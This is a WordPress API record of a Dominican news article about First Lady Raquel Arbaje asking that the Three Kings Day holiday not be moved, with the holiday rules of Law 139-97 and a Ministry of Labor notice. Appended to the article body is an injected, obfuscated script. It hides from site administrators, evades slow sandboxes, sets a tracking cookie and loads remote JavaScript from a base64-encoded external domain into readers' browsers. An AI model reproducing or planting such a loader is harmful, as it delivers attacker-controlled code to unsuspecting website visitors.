{"id":13116,"date":"2023-01-06T10:30:25","date_gmt":"2023-01-06T14:30:25","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13116"},"modified":"2023-01-06T10:30:25","modified_gmt":"2023-01-06T14:30:25","slug":"raquel-arbaje-ojala-y-algun-dia-decidan-los-congresistas-dejar-este-dia-inamovible","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13116","title":{"rendered":"Raquel Arbaje: Ojal\u00e1 y alg\u00fan d\u00eda decidan los congresistas dejar este d\u00eda inamovible"},"content":{"rendered":"<p>La primera dama, Raquel Arbaje, abog\u00f3 este viernes para que el D\u00eda de los Santos Reyes no sea cambiado como pasa en la actualidad en el pa\u00eds.<\/p>\n<p>\u00abHoy es d\u00eda de la Epifan\u00eda del Se\u00f1or, o com\u00fanmente de Los Reyes Magos, no tengo nada contra Santa Claus, pero recuerdo con nostalgia la grama recortada . Ojal\u00e1 y alg\u00fan d\u00eda decidan los congresistas dejar este d\u00eda inamovible, y que en nuestra alma de ni\u00f1o adulto nos dejen Fe y Salud\u00bb, expres\u00f3 la tambi\u00e9n presidenta del Gabinete de la Ni\u00f1ez a trav\u00e9s de su cuenta de Twitter.<\/p>\n<p>La Ley No. 139-97 dispone el car\u00e1cter no laborable de todos los d\u00edas feriados del calendario que coincidan con los d\u00edas martes, mi\u00e9rcoles, jueves o viernes de la semana que se trate, ser\u00e1 efectivo conforme a la siguiente pauta:<\/p>\n<p>1) Martes y mi\u00e9rcoles, el lunes precedente.<\/p>\n<p>2) Jueves y viernes, el lunes siguiente.<\/p>\n<p>Asimismo, establece cu\u00e1les festividades pueden moverse a otro d\u00eda y cu\u00e1les deben permanecer en su misma fecha.<\/p>\n<p>Quedan excluidos del \u00e1mbito de aplicaci\u00f3n los siguientes d\u00edas feriados:<\/p>\n<p>1 de enero, d\u00eda de A\u00f1o Nuevo.<br \/>\n21 de enero, d\u00eda de Nuestra Se\u00f1ora de La Altagracia.<br \/>\n27 de febrero, d\u00eda de la Independencia Nacional.<br \/>\n16 de agosto, cuando coincida con el inicio de un per\u00edodo constitucional.<br \/>\n24 de septiembre, d\u00eda de Las Mercedes.<br \/>\n25 de diciembre, d\u00eda de Navidad.<\/p>\n<p>Adem\u00e1s, los d\u00edas feriados de car\u00e1cter religioso que se fijan en raz\u00f3n del d\u00eda de la semana: jueves Corpus Christi, jueves y\u00a0viernes Santo.<\/p>\n<p><strong>El Ministerio de Trabajo<\/strong>\u00a0reitera a toda la colectividad empresarial y trabajadora de la Rep\u00fablica Dominicana, que\u00a0<strong>el viernes 06 de enero, \u201cD\u00eda de los Santos Reyes\u201d, se trabaja y se cambia el feriado para el lunes 09 del mes en curso.<\/strong><\/p>\n<p>Los servidores p\u00fablicos y privados deben reintegrarse a sus labores cotidianas el\u00a0<strong>martes 10 de enero<\/strong>.<\/p>\n<p>La celebraci\u00f3n de esta fecha, de conformidad con lo establecido por la legislaci\u00f3n dominicana, deber\u00e1 ser aplicada en\u00a0<strong>todos los establecimientos del pa\u00eds.<\/strong><\/p>\n<p>&nbsp;<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>La primera dama, Raquel Arbaje, abog\u00f3 este viernes para que el D\u00eda de los Santos Reyes no sea cambiado como pasa en la actualidad en el pa\u00eds. \u00abHoy es d\u00eda de la Epifan\u00eda del Se\u00f1or, o com\u00fanmente de Los Reyes Magos, no tengo nada contra Santa Claus, pero recuerdo con nostalgia la grama recortada . [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13118,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13116","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13116","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13116"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13116\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13118"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13116"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13116"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13116"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}